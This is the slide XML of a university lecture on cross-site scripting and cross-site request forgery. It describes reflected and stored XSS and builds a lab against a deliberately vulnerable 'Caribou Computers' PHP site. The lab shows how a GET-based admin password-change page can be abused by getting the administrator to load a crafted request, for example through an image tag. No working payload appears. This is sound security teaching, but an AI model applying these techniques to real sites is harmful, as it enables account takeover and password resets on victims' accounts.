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68" r:id="rId2"/>
    <p:sldId id="367" r:id="rId3"/>
    <p:sldId id="381" r:id="rId4"/>
    <p:sldId id="390" r:id="rId5"/>
    <p:sldId id="391" r:id="rId6"/>
    <p:sldId id="392" r:id="rId7"/>
    <p:sldId id="393" r:id="rId8"/>
    <p:sldId id="395" r:id="rId9"/>
    <p:sldId id="394" r:id="rId10"/>
    <p:sldId id="396" r:id="rId11"/>
    <p:sldId id="397" r:id="rId12"/>
    <p:sldId id="398" r:id="rId13"/>
    <p:sldId id="400" r:id="rId14"/>
    <p:sldId id="399" r:id="rId15"/>
    <p:sldId id="401" r:id="rId16"/>
    <p:sldId id="402" r:id="rId17"/>
    <p:sldId id="403" r:id="rId18"/>
    <p:sldId id="404" r:id="rId19"/>
    <p:sldId id="407" r:id="rId20"/>
    <p:sldId id="408" r:id="rId21"/>
    <p:sldId id="405" r:id="rId22"/>
    <p:sldId id="40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FF3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55" y="3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5/7/2023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xcess-xss.com/" TargetMode="External"/><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stackoverflow.com/questions/35985551/how-does-csrf-work-without-state-parameter-in-oauth2-0" TargetMode="External"/><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hyperlink" Target="https://creativecommons.org/licenses/by-sa/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07DDD9-44B9-4DDC-AD36-6E0E9096375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090" b="12090"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15" y="10"/>
            <a:ext cx="12191985" cy="4578340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148F256B-1C20-47A6-92E3-6CAFC3E4BF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="4799362"/>
            <a:ext cx="10113645" cy="743682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Development &amp; Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{918AA328-CC01-4A3F-8A04-FA3FA838E6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097279" y="5715000"/>
            <a:ext cx="10113264" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lecture 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A7:2017- More Cross-Site Scripting (XSS) and Cross-Site Request Forging (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303A4B1D-575F-4373-BBD1-AF7B812E2DFB}"/>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excess-xss.com/"/>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378297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Is this still XSS?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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We didn’t really mention it before but there are two major types of XSS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected XSS – Where, the user is tricked into taking some action the results in a HTTP request making some kind of malicious change to the site.  Our prior example provided a malicious link that “bounced” off the Caribou Computer site in order to capture someone’s cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS – this is when site data can be modified to access another web site in a malicious way.  Our comment “stored” our hack on the Caribou Computer site and would be activated every time a user read loaded that comment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1011078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aphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DCAE8B-5AE2-41B4-8687-2491E76B475D}"/>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4548" b="14548"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{456B2633-4394-458A-9E9B-F2676C9CC933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Request Forging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE7703E-3BBA-4051-A46B-77CD53C7542E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8AB5CE-83FA-48AD-964C-69C6DDD2FE32}"/>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s://stackoverflow.com/questions/35985551/how-does-csrf-work-without-state-parameter-in-oauth2-0"/>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606282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One more attack!</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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making malicious links can harm a site BUT people have to be tricked to click on them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing JavaScript to be executed can also be a good attack but we need access to the site to plant it and the site has to be terribly lax about accepting HTML.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if instead, there was a kind of attack that could be executed simply by visiting a web page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="987216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Getting Started</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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log in as someone other than the administrator and point your browser at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139758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 (again!)</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1" cy="397661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Caribou computers is getting pretty big and now they’ve realized that they need to hire someone to do some administrative tasks like change passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They don’t want to give this person access to their entire website, and they don’t really want to hire a developer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, they create an administration page in PHP to handle things!</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49264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 (again!)</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1" cy="397661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The administrative page is secured against someone just randomly finding it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unless you’re logged in as the administrator you will get the very pointed message on the left!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log in as administrator and try again!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(to log in you will have to clear the cookies and go back to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers2.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> site!)</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358239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 (again!)</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0" cy="397661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Ok, that’s better!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So here we have a page where the administrator (and only the administrator!) can select a user and change their password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go ahead and try it!</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299526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 (again!)</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0" cy="397661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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, we’ve just changed Larry’s password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clearly this works by using a GET request and passing parameters in on the URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since site authentication is done by cookies and cookies are sent when a request is made to the host site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then in theory we could get someone else to do our dirty work for us if we could craft an HTTP request and somehow get the administrator to send it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From there we could reset anyone’s passwords!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>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3877472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 (again!)</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0" cy="397661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There are a lot of ways to do this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on our last exploit you might think about using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fetch().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, most cookies have a special flag set in them called “http-only” this stops the cookie from being accessed via JavaScript’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> facility.</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1282832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 (again!)</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2422493"/>
            <a:ext cx="4477570" cy="3131014"/>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During this course, you may have gotten the impression that when you point your browser at a web page.  The browser sends a single HTTP Request, and the server replies with a single HTTP Response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nothing could be further from the truth.  Go ahead and open up the browser developer tools.  Click on the Network tab. Now go to a commercial web page like Amazon or Apple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should see dozens of HTTP requests generated from that single URL.</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354317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Getting started</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80" y="2120900"/>
            <a:ext cx="10058400" cy="3748194"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To follow along download the zip file marked “Files for lecture 11” and extract its contents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two php scripts:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers2.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> and one HTML file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite2.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. Upload all three of them to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>TurnKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux server in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/var/www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> directory!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is also an SQL script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import that through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Adminer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.  This will re-create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ontario_computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> database and add a new comments table.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Once you do that you can point your browser at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://&lt;your sever IP&gt;/caribou_computers2.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If you’re not logged in, go ahead and type in a username/password that you made for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ontario_computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(both sites use the same database) otherwise just create a new account.</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3179011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 (again!)</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Where do all these come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every time your browser loads a resource.  Either because of an AJAX request or even just an image via the HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A new HTTP Request is created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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B05F0A19-1423-02C2-3D14-8CB00D7493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2422493"/>
            <a:ext cx="4477570" cy="3131014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3653559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 (again!)</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…and that’s our answer!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
